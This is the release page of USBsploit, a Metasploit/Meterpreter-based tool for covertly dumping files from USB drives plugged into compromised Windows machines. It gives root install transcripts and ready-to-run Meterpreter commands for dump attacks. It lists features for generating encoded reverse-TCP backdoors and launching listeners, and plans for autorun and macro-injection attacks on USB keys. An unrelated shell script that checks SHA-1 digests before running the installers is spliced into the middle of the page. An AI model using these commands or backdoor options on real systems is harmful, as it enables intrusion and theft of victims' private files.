Summary: USBsploit: PoC for dumping files from remote USB drives on multiple targets at the same time. It works through Meterpreter sessions with a light (24MB) modified version of Metasploit. The interface is a modified version of SET. usbsploit.rb can be used with the original Metasploit Framework.
Report bugs to
https://twitter.com/secuobs or
xavier.poli@infratech.fr (recommended for privacy issues), KeyID: 0x3A3D555A, FingerPrint: 04B1 244C CC25 DA93 EB73 EF52 E278 881F 3A3D 555A,
xpo.asc
The usbsploit.rb script seems to have some issues when used with the default Ruby version of BackTrack 4; installing Ruby 1.9.1 fixes them. Details to give in bug reports:
- the version of Python,
- the version of Ruby,
- the version of Metasploit if used,
- the OS of the targets,
- the OS of the listener,
- the hardware details for the targets, the listener and the USB drives,
- the security solutions installed on both the targets and the listener,
- the particular firewall configuration on both the targets and the listener,
- the version of VMware or other virtualisation software if used,
- the last file for the Dump configuration,
- the stage at which the bug was identified,
- the global USBsploit options if changed,
- the output of the high verbosity scan,
- the output of USBsploit.
To use USBsploit, you certainly need the same dependencies (link) as the Metasploit Framework.
Installation through SVN (link)
root@xpo_secuobs:~# svn -q co https://svn.secuobs.com/svn
Erreur de validation du certificat du serveur pour 'https://svn.secuobs.com:443':
- Le certificat n'est pas signé pas une autorité de confiance.
Valider le certificat manuellement !
Informations du certificat :
- nom d'hôte : svn.secuobs.com
- valide de Fri, 09 Jul 2010 15:00:30 GMT à Mon, 06 Jul 2020 15:00:30 GMT
- signataire : XPO, SECUOBS, PARIS, IDF, FR
- empreinte : 80:44:9d:01:ac:6e:69:65:2a:7f:2a:ec:46:c0:a6:6e:d4:16:5a:8e
(R)ejet, acceptation (t)emporaire ou (p)ermanente ? p
root@xpo_secuobs:~# cd svn/
root@xpo_secuobs:~/svn# ./installer.sh
Type usbsploit to launch the USBsploit Framework
root@xpo_secuobs:~/svn# cd ../
root@xpo_secuobs:~# rm -fr svn
root@xpo_secuobs:~# usbsploit
Installation through usbsploit-0.1-beta-linux-i686.run (link)
root@xpo_secuobs:~# wget https://www.secuobs.com/usbsploit/usbsploit-0.1-beta-linux-i686.run
root@xpo_secuobs:~# sha1sum usbsploit-0.1-beta-linux-i686.run
679ffe7c61608880ef8f8007393976cbedc18f22 usbsploit-0.1-beta-linux-i686.run
root@xpo_secuobs:~# sh usbsploit-0.1-beta-linux-i686.run
Type usbsploit to launch the USBsploit Framework
root@xpo_secuobs:~# rm -fr usbsploit
root@xpo_secuobs:~# usbsploit
The USBsploit Framework 0.1 BETA
Report bugs to: xavier.poli@infratech.fr
Homepage: http://www.secuobs.com
Based on modified versions of:
- Metasploit (original from HDM)
- SET (original from ReL1K)
It's the first launch, an update will be performend for the USBsploit Framework, be patient...
Erreur de validation du certificat du serveur pour 'https://svn.secuobs.com:443':
- Le certificat n'est pas signé pas une autorité de confiance.
Valider le certificat manuellement !
Informations du certificat :
- nom d'hôte : svn.secuobs.com
- valide de Fri, 09 Jul 2010 15:00:30 GMT à Mon, 06 Jul 2020 15:00:30 GMT
- signataire : XPO, SECUOBS, PARIS, IDF, FR
- empreinte : 80:44:9d:01:ac:6e:69:65:2a:7f:2a:ec:46:c0:a6:6e:d4:16:5a:8e
(R)ejet, acceptation (t)emporaire ou (p)ermanente ? p
Installation through usbsploit-0.1-beta-linux-i686.tar.gz (link)
root@xpo_secuobs:~# wget https://www.secuobs.com/usbsploit/usbsploit-0.1-beta-linux-i686.tar.gz
root@xpo_secuobs:~# sha1sum usbsploit-0.1-beta-linux-i686.tar.gz
cf2d40e1236e266ac62e7d6140646cc3e050d5d2 usbsploit-0.1-beta-linux-i686.tar.gz
root@xpo_secuobs:~# tar zxvf usbsploit-0.1-beta-linux-i686.tar.gz
root@xpo_secuobs:~# cd usbsploit
root@xpo_secuobs:~/usbsploit# ./installer.sh
Type usbsploit to launch the USBsploit Framework
root@xpo_secuobs:~/usbsploit# cd ../
root@xpo_secuobs:~# rm -fr usbsploit/
root@xpo_secuobs:~# usbsploit
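In both the .run and the tar.gz procedures above, the archive is downloaded over an untrusted connection, its SHA-1 is printed, and the installer is then run as root without anything comparing that digest to the one the author published. The script below is an added example, not part of USBsploit or Metasploit: it refuses to execute the installer unless the digest matches, assumes sha1sum (or shasum) is on the PATH, and copies the two published digests from this page in as constants.

```shell
#!/bin/sh
# Added example (not USBsploit's own code): only run a downloaded installer
# after its SHA-1 matches the value the author published.
set -u

# Digests copied from the installation transcripts on this page.
USBSPLOIT_RUN_SHA1=679ffe7c61608880ef8f8007393976cbedc18f22
USBSPLOIT_TGZ_SHA1=cf2d40e1236e266ac62e7d6140646cc3e050d5d2

# sha1_of FILE: print the lowercase hex SHA-1 of FILE.
# Uses sha1sum where present (GNU coreutils), otherwise shasum (BSD/macOS).
sha1_of() {
    if command -v sha1sum >/dev/null 2>&1; then
        sha1sum "$1" | awk '{print $1}'
    else
        shasum -a 1 "$1" | awk '{print $1}'
    fi
}

# verify_sha1 FILE EXPECTED: exit status 0 only when the digests match.
# The expected value is lowercased so a copy-pasted uppercase digest still works.
verify_sha1() {
    actual=$(sha1_of "$1") || return 2
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    [ "$actual" = "$expected" ]
}

# install_verified FILE EXPECTED: run the .run installer only after verification.
install_verified() {
    if verify_sha1 "$1" "$2"; then
        sh "$1"
    else
        echo "SHA-1 mismatch for $1, refusing to run it" >&2
        return 1
    fi
}

# Usage with the page's .run archive:
#   install_verified usbsploit-0.1-beta-linux-i686.run "$USBSPLOIT_RUN_SHA1"
```

The same verify_sha1 call guards the tar.gz path: check the archive against USBSPLOIT_TGZ_SHA1 before running tar and installer.sh.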
The USBsploit Framework 0.1 BETA
Report bugs to: xavier.poli@infratech.fr
Homepage: http://www.secuobs.com
Based on modified versions of:
- Metasploit (original from HDM)
- SET (original from ReL1K)
It's the first launch, an update will be performend for the USBsploit Framework, be patient...
Erreur de validation du certificat du serveur pour 'https://svn.secuobs.com:443':
- Le certificat n'est pas signé pas une autorité de confiance.
Valider le certificat manuellement !
Informations du certificat :
- nom d'hôte : svn.secuobs.com
- valide de Fri, 09 Jul 2010 15:00:30 GMT à Mon, 06 Jul 2020 15:00:30 GMT
- signataire : XPO, SECUOBS, PARIS, IDF, FR
- empreinte : 80:44:9d:01:ac:6e:69:65:2a:7f:2a:ec:46:c0:a6:6e:d4:16:5a:8e
(R)ejet, acceptation (t)emporaire ou (p)ermanente ? p
Installation of usbsploit.rb working with the original Metasploit Framework (link)
root@xpo_secuobs:~# wget https://www.secuobs.com/usbsploit/usbsploit-0.1-beta-linux-i686.tar.gz
root@xpo_secuobs:~# sha1sum usbsploit-0.1-beta-linux-i686.tar.gz
cf2d40e1236e266ac62e7d6140646cc3e050d5d2 usbsploit-0.1-beta-linux-i686.tar.gz
root@xpo_secuobs:~# tar zxvf usbsploit-0.1-beta-linux-i686.tar.gz
root@xpo_secuobs:~# mv usbsploit/lib/msf/scripts/meterpreter/usbsploit.rb /opt/metasploit3/msf3/scripts/meterpreter/
root@xpo_secuobs:~# mv usbsploit/lib/msf/data/textextensions /opt/metasploit3/msf3/data/
root@xpo_secuobs:~# rm -fr usbsploit/
root@xpo_secuobs:~# msfconsole
When you have a Meterpreter session:
- Get some help
meterpreter > run usbsploit -h
- Launch a Dump attack on all files with high verbosity and only during one successful scan with dumped files
meterpreter > run usbsploit -v -w -d
- Launch a Dump attack only on files matching the predefined set of extensions with high verbosity and only during one successful scan with dumped files
meterpreter > run usbsploit -v -w -e /opt/metasploit3/msf3/data/textextensions -t
- Launch a Dump attack on all files with high verbosity in an infinite loop
meterpreter > run usbsploit -v -d
- Launch a Dump attack only on files matching the predefined set of extensions with high verbosity in an infinite loop
meterpreter > run usbsploit -v -e /opt/metasploit3/msf3/data/textextensions -t
Just remove the "-v" switch to deactivate the high verbosity.
Edit the /opt/metasploit3/msf3/data/textextensions file to set the extensions to dump.
USBsploit resources:
- Video: USBsploit gets all the remote USB files through Meterpreter and a modified MSF
- Video: USBsploit gets all the remote USB files by extensions through Meterpreter and a modified MSF
- Video: usbsploit.rb and the original MSF to get all the remote USB files through Meterpreter
- Video: usbsploit.rb and the original MSF to get all the remote USB files by extensions through Meterpreter
- How to install USBsploit v0.1b through SVN, the tar.gz, the .run or to work with original Metasploit
Changelog:
V0.1b:
- USBsploit v0.1b was tested under a GNU/Linux operating system with Python 2.6.2 and ruby 1.9.1,
- USBsploit v0.1b was tested against a target Microsoft Windows XP PRO SP3 running under a GNU/Linux VMware Server 2.0.2,
- USBsploit v0.1b needs the wmic command on the targets (Windows XP home is not a possible target),
- USBsploit v0.1b works against multiple targets at the same time and multiple USB keys on each target,
- USBsploit v0.1b handles multiple plugs and unplugs of the same key,
- USBsploit v0.1b can be installed via SVN, ".run" or ".tar.gz" archives,
- USBsploit v0.1b can be managed through a Python interface (a modified version of the Social Engineering Toolkit, original by ReL1K),
- USBsploit v0.1b can be updated via SVN,
- USBsploit v0.1b allows auto-updates to be activated and deactivated,
- USBsploit v0.1b allows editing the global configuration file,
- USBsploit v0.1b allows generating Meterpreter Backdoors with some available options (IP of the listener, type of Backdoor, type of Encoding, port of the Listener, multiple Encoding stages) and choosing whether a Dump Listener will be launched,
- USBsploit v0.1b allows generating Meterpreter Backdoors with the same kind of options and launching a Dump Listener automatically,
- USBsploit v0.1b lets you choose between the 3 types of Meterpreter Backdoors available (Reverse_TCP, the only one tested for now, Reverse_TCP_X64, Egress Buster),
- USBsploit v0.1b lets you choose between 3 types of Encoding for the Meterpreter Backdoors (shikata_ga_nai, Multi-Encoder, Backdoored Executable),
- USBsploit v0.1b allows dumping all the files from a remote USB key through multiple Meterpreter sessions and a light version (24MB) of Metasploit (original by HDM),
- USBsploit v0.1b allows dumping, from a remote USB key, all the files matching a specific set of extensions defined in a text file,
- USBsploit v0.1b allows editing the file that defines the set of extensions,
- USBsploit v0.1b allows launching a Dump Listener from the last Dump configuration file,
- USBsploit v0.1b allows editing the last Dump configuration file,
- USBsploit v0.1b allows activating the high verbosity mode,
- USBsploit v0.1b allows choosing between a single USB Scan/Dump ending with success for each attack or an infinite loop,
- Ruby script usbsploit.rb is compatible with the original Metasploit Framework (all the options work with version 3.4.x; earlier versions weren't tested).
Possible evolutions:
- The future versions of USBsploit could inject a malicious VBS script into the XLS files available on the remote USB keys, by uploading and executing the XLSinjector tool,
- The future versions of USBsploit could upload and execute a modified version of USBDumper 0.2 on the targets, injecting a malicious VBS script into the XLS and DOC files available on the remote USB keys that way,
- The future versions of USBsploit could launch an Autorun attack by uploading malicious files (autorun.inf, autorun.ico and usbsploitBackdoor.exe) on the remote USB keys,
- The future versions of USBsploit could target the USB U3 keys,
- The future versions of USBsploit could target the PDF files available on the remote USB keys with various attacks,
- The future versions of USBsploit could reintegrate the features of SET to spread the Backdoors,
- Others?